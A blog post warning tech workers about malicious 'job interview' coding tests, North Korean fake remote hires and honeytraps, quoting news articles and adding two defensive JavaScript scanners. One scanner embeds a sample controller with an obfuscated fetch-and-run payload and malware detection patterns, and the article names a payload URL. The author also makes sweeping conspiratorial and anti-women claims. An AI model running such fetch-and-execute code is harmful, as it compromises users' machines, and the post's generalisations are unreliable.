
Watch out for hackers and spies during work

A while back I blogged about how the criminal US Government has spies in major (tech) companies. It was clear from that post that if you work at Big Tech companies or companies doing any kind of sensitive work, some of your co-workers are probably connected to 3-letter agencies such as the NSA, CIA and even Mossad. These days the problem is only getting worse; let’s take a look at some examples.

If you’re being approached by job recruiters, you might want to be extra careful as they might be spies or hackers. They might ‘simply’ be hackers who’re trying to get into your own system to steal your cryptocurrency, but they might also be hackers who’re trying to hack into the company that you’re working for, or one or more of your clients through you (for example if you have access to your client’s IT infrastructure). One way in which they can try to do that is by getting you to run certain software on your system or opening certain files (such as PDF files containing malicious content).

Here’s an example from David Didda, “How I Almost Got Hacked By A ‘Job Interview’” (October 15th 2025):

Last week, I got a LinkedIn message from Mykola Yanchii. Chief Blockchain Officer at Symfa. Real company. Real LinkedIn profile. 1,000+ connections. The works. The message was smooth. Professional. “We’re developing BestCity, a platform aimed at transforming real estate workflows. Part-time roles available. Flexible structure.”

Before our meeting, Mykola sent me a “test project” — standard practice for tech interviews. A React/Node codebase to evaluate my skills. 30-minute test. Simple enough. The Bitbucket repo looked professional. Clean README. Proper documentation. Even had that corporate stock photo of a woman with a tablet standing in front of a house. You know the one. Here’s where I almost screwed up: I was running late for our call. Had about 30 minutes to review the code. So I did what lazy developers do — I started poking around the codebase without running it first.

Usually, I sandbox everything. Docker containers. Isolated environments. But I was in a rush. I spent 30 minutes fixing obvious bugs, adding a docker-compose file, cleaning up the code. Standard stuff. Ready to run it and show my work. Then I had one of those paranoid developer moments.

Before hitting npm start, I threw this prompt at my Cursor AI agent: “Before I run this application, can you see if there are any suspicious code in this codebase? Like reading files it shouldn’t be reading, accessing crypto wallets etc.”

And holy sh*t.

Sitting right in the middle of server/controllers/userController.js was this beauty: […] Obfuscated. Sneaky. Evil. And 100% active — embedded between legitimate admin functions, ready to execute with full server privileges the moment admin routes were accessed.

I decoded that byte array: https://api.npoint.io/2c458612399c3b2031fb9

When I first hit the URL, it was live. I grabbed the payload. Pure malware. The kind that steals everything — crypto wallets, files, passwords, your entire digital existence. Here’s the kicker: the URL died exactly 24 hours later. These guys weren’t messing around – they had their infrastructure set up to burn evidence fast.

Here’s what made this so dangerous:

Urgency: “Complete the test before the meeting to save time.”

Authority: LinkedIn verified profile, real company, professional setup.

Familiarity: Standard take-home coding test. Every developer has done dozens of these.

Social Proof: Real company page with real employees and real connections.

I almost fell for it. And I’m paranoid about this stuff.

In this case the ‘recruiter’ tried to get the target to run a malicious program, disguised as a skills-assessment project, on the target’s own computer. Quite often they will instead just send malicious images and documents, for example a company profile in PDF format, and insist that you open them immediately while they are ‘interviewing’ you.
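A defensive check in the spirit of the prompt Didda gave his AI agent, as an added example rather than code from this post or from his article: a small Node script that scans a take-home project’s source before anything is run. It decodes numeric byte arrays and `\xNN` escape strings (two common ways a payload URL is hidden in otherwise ordinary-looking code) and flags risky sinks such as `eval`/`new Function`, `child_process`, remote fetches and `String.fromCharCode` decoding. The controller source it scans is constructed for the example, the URL inside it is a placeholder domain, and the indicator list is my own, not the article’s.

```javascript
// Added example, not code from the post or the quoted article: a pre-run
// static scan for a take-home Node/React project. It decodes the obfuscated
// literals commonly used to hide a payload URL (numeric byte arrays, \xNN
// escape strings) and flags risky sinks, so the reviewer sees what the code
// would do before `npm start` gives it a chance to do it.

// Assumed indicator list (my own, not from the article); extend per policy.
const INDICATORS = [
  { id: 'dynamic-eval',    re: /\beval\s*\(|new\s+Function\s*\(/ },
  { id: 'child-process',   re: /require\s*\(\s*['"]child_process['"]\s*\)|from\s+['"]child_process['"]/ },
  { id: 'remote-fetch',    re: /\b(fetch|axios\.get|https?\.get|https?\.request)\s*\(/ },
  { id: 'charcode-decode', re: /String\.fromCharCode\s*\(/ },
  { id: 'wallet-keyword',  re: /\b(wallet|keystore|mnemonic)\b/i },
  { id: 'home-dir',        re: /os\.homedir\s*\(|process\.env\.(HOME|USERPROFILE|APPDATA)\b/ },
];

// `[104,116,116,112,...]` arrays of printable bytes become readable text.
function decodeByteArrays(src) {
  const out = [];
  const re = /\[\s*((?:\d{1,3}\s*,\s*){7,}\d{1,3})\s*\]/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const bytes = m[1].split(',').map(n => parseInt(n.trim(), 10));
    if (bytes.every(b => b >= 32 && b <= 126)) {
      out.push({ offset: m.index, text: String.fromCharCode(...bytes) });
    }
  }
  return out;
}

// `"\x68\x74\x74\x70..."` escape runs become readable text.
function decodeHexStrings(src) {
  const out = [];
  const re = /((?:\\x[0-9a-fA-F]{2}){6,})/g;
  let m;
  while ((m = re.exec(src)) !== null) {
    const text = m[1].replace(/\\x([0-9a-fA-F]{2})/g, (_, h) => String.fromCharCode(parseInt(h, 16)));
    out.push({ offset: m.index, text });
  }
  return out;
}

function lineOf(src, offset) {
  return src.slice(0, offset).split('\n').length;
}

// Scan one file's source; returns findings sorted by line number.
function scanSource(filename, src) {
  const findings = [];
  for (const hidden of [...decodeByteArrays(src), ...decodeHexStrings(src)]) {
    if (/https?:\/\/|\.(js|sh|exe|ps1)\b/i.test(hidden.text)) {
      findings.push({ file: filename, line: lineOf(src, hidden.offset), id: 'hidden-url', detail: hidden.text });
    }
  }
  src.split('\n').forEach((text, i) => {
    for (const ind of INDICATORS) {
      if (ind.re.test(text)) findings.push({ file: filename, line: i + 1, id: ind.id, detail: text.trim() });
    }
  });
  return findings.sort((a, b) => a.line - b.line);
}

// Constructed controller source standing in for the one the article elides.
// The byte array spells a placeholder URL (payload.example.invalid), not the
// real one from the article.
const SAMPLE_CONTROLLER = `
const User = require('../models/User');
exports.listUsers = async (req, res) => res.json(await User.find());

// looks like config loading, actually fetches and runs a remote payload
const c = [104,116,116,112,115,58,47,47,112,97,121,108,111,97,100,46,101,120,97,109,112,108,101,46,105,110,118,97,108,105,100,47,108,111,97,100,101,114,46,106,115];
const u = String.fromCharCode(...c);
fetch(u).then(r => r.text()).then(t => new Function(t)());

exports.deleteUser = async (req, res) => { await User.deleteOne({ _id: req.params.id }); res.sendStatus(204); };
`;

function scanSample() {
  return scanSource('server/controllers/userController.js', SAMPLE_CONTROLLER);
}

for (const f of scanSample()) {
  console.log(`${f.file}:${f.line} [${f.id}] ${f.detail}`);
}
```

Run it over a cloned repository before `npm start`; anything flagged as `hidden-url` or `dynamic-eval` means the project gets read in a throwaway VM, not executed on the machine that holds your wallets and client credentials. It is a triage aid, not a verdict: obfuscation that assembles strings some other way will slip past it, so a clean scan is not a clean bill of health.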

Then there’s also the problem of fake remote workers who’re hackers and spies trying to get into companies in other countries to gather intelligence and steal company assets. Here’s from Forbes, “North Korean Hackers Pose As Remote Workers To Infiltrate U.S. Firms” (April 25th 2025):

Even cybersecurity companies aren’t immune. In mid-2024, KnowBe4, a global leader in security awareness training, hired a seemingly well-qualified remote software engineer. The candidate passed a rigorous background check, provided references, attended multiple video interviews, and even submitted a professional photo.

But just weeks into the role, their security team discovered malware being installed on the employee’s company-issued laptop. The engineer wasn’t who he claimed to be. He was a North Korean threat actor using a stolen U.S. identity and an AI-enhanced image to dupe one of the most security-conscious companies in the world.

That incident, once viewed as an outlier, now appears to be part of a much larger and more coordinated national security threat. Just weeks later, in January 2025, another indictment charged two additional North Korean nationals and three international facilitators — including two U.S. citizens — with similar fraud. That group allegedly infiltrated 64 U.S. companies, laundering more than $866,000 through just ten of them. One of the American defendants reportedly ran a “laptop farm” out of his North Carolina home, receiving company-issued devices and installing remote access software so North Korean workers could appear to be U.S.-based hires.

The methods used by these operatives are sophisticated and increasingly difficult to detect:

  • Stolen or forged identities, including U.S. passports
  • Phony resumes and fake company websites to establish legitimacy
  • AI-generated or enhanced photographs (deepfakes)
  • Fabricated LinkedIn-style profiles
  • Proxy interview participants paid to impersonate fake applicants
  • Remote device “laptop farms” in the U.S. to spoof local logins

Hiring fraud has evolved. It’s no longer limited to resume inflation or fake degrees. It now involves state-sponsored threat actors, synthetic identities, and cross-border data laundering. The stakes? Intellectual property theft, regulatory liability, sanctions exposure, and brand-damaging extortion. And it’s not just the “big names” being targeted. The DOJ confirmed that dozens of U.S. companies, across sectors, have unknowingly employed Democratic People’s Republic of Korea (DPRK) operatives, sometimes for years.
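The detection side of the laptop-farm pattern Forbes describes, as an added example that is not from the article or from KnowBe4: many company-issued laptops assigned to different new hires all checking in from one residential egress address, with unapproved remote-access software installed so someone elsewhere can drive them. The telemetry rows, field names and approved-tool policy below are constructed assumptions for the example, not any vendor’s schema.

```javascript
// Added example, not from the post or the Forbes article: scoring constructed
// endpoint telemetry for the "laptop farm" pattern the article describes.
// Field names, sample rows and the approved-tool policy are assumptions.

// Constructed check-in summaries: one row per company-issued device.
const TELEMETRY = [
  { device: 'LT-1001', employee: 'alice', egressIp: '198.51.100.7', tools: ['slack', 'vscode'] },
  { device: 'LT-1002', employee: 'bob',   egressIp: '203.0.113.9',  tools: ['zoom'] },
  { device: 'LT-2001', employee: 'carol', egressIp: '192.0.2.44',   tools: ['anydesk', 'chrome'] },
  { device: 'LT-2002', employee: 'dave',  egressIp: '192.0.2.44',   tools: ['teamviewer'] },
  { device: 'LT-2003', employee: 'erin',  egressIp: '192.0.2.44',   tools: ['vscode'] },
  { device: 'LT-2004', employee: 'frank', egressIp: '192.0.2.44',   tools: ['rustdesk'] },
];

// Remote-access products outside the org's approved tooling (assumed policy).
const UNAPPROVED_REMOTE_ACCESS = new Set(['anydesk', 'teamviewer', 'rustdesk', 'splashtop']);
// Distinct employees behind one egress IP before it is treated as a farm.
const SHARED_EGRESS_THRESHOLD = 3;

// Group devices by egress IP and report IPs shared by many different people.
function findSharedEgress(rows, threshold = SHARED_EGRESS_THRESHOLD) {
  const byIp = new Map();
  for (const r of rows) {
    if (!byIp.has(r.egressIp)) byIp.set(r.egressIp, new Map());
    byIp.get(r.egressIp).set(r.device, r.employee);
  }
  const findings = [];
  for (const [ip, devices] of byIp) {
    const employees = new Set(devices.values());
    if (employees.size >= threshold) {
      findings.push({ egressIp: ip, devices: [...devices.keys()].sort(), employees: [...employees].sort() });
    }
  }
  return findings;
}

// Devices running remote-access software that is not on the approved list.
function findUnapprovedRemoteAccess(rows) {
  return rows
    .map(r => ({ device: r.device, employee: r.employee,
                 tools: r.tools.filter(t => UNAPPROVED_REMOTE_ACCESS.has(t.toLowerCase())) }))
    .filter(f => f.tools.length > 0);
}

// Shared egress weighs more than remote-access tooling, which also has benign
// uses; a device with both is the first thing to pull for review.
function prioritize(rows) {
  const shared = new Set(findSharedEgress(rows).flatMap(f => f.devices));
  const remote = new Set(findUnapprovedRemoteAccess(rows).map(f => f.device));
  return rows
    .map(r => ({ device: r.device, employee: r.employee,
                 score: (shared.has(r.device) ? 2 : 0) + (remote.has(r.device) ? 1 : 0) }))
    .filter(x => x.score > 0)
    .sort((a, b) => b.score - a.score || a.device.localeCompare(b.device));
}

for (const x of prioritize(TELEMETRY)) {
  console.log(`${x.device} (${x.employee}) review score ${x.score}`);
}
```

The shared-egress rule is the strong signal, since unrelated colleagues rarely share a home connection; the remote-access rule only raises priority, because such tools are also installed for benign reasons. In practice the egress IP comes from the MDM or EDR check-in record, and the HR system supplies the claimed home location to compare it against.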

Honeytrap

And then there’s the very ancient method of using attractive women as honeytraps. Here’s from The Times, “Female spies are waging ‘sex warfare’ to steal Silicon Valley secrets” (October 22nd 2025):

Chinese and Russian operatives are using “sex warfare” to seduce and spy on Silicon Valley professionals, industry insiders have told The Times. James Mulvenon, the chief intelligence officer of Pamir Consulting, which provides risk assessments for American companies investing in China, said he was one of the many men recently targeted by foreign seductresses hoping to gain access to US tech secrets. “I’m getting an enormous number of very sophisticated LinkedIn requests from the same type of attractive young Chinese woman,” said Mulvenon. “It really seems to have ramped up recently.”

Both Russia and the CCP are using ordinary citizens — investors, crypto analysts, businessmen and academics — to target their American counterparts, rather than trained agents, making the espionage harder to spot. “We’re not chasing a KGB agent in a smoky guesthouse in Germany anymore,” said one senior US counterintelligence official. “Our adversaries — particularly the Chinese — are using a whole-of-society approach to exploit all aspects of our technology and Western talent.”

One former counterintelligence official, who now helps Silicon Valley founders divest their foreign investments, said he recently investigated the case of one “beautiful” Russian woman who worked at an aerospace company and married an American colleague. He discovered that she had gone to a modelling academy in her twenties but later attended a “Russian soft-power school” before disappearing for a decade and re-emerging in the US as a cryptocurrency expert. “But she doesn’t stay in crypto,” the ex-official said. “She is trying to get to the heights of the military-space innovation community. The husband’s totally oblivious.”

“Showing up, marrying a target, having kids with a target — and conducting a lifelong collection operation, it’s very uncomfortable to think about but it’s so prevalent,” he continued. “If I wanted to be out of the shadows, I’d write a book on it.”

There’s a popular meme doing the rounds on the internet recently around the idea that if your girlfriend is very beautiful — and especially when she’s out of your league so to speak — she’s probably a honeytrap.

You might want to be extra paranoid when you get approached by women these days and be extra careful about sharing any kind of information with them. It’s probably best to set boundaries and not let them into your personal and professional life. As I mentioned in a previous post about honeytraps, it helps to have unpredictable daily routines and to not share much personal information about yourself (online) that could be used to target you.
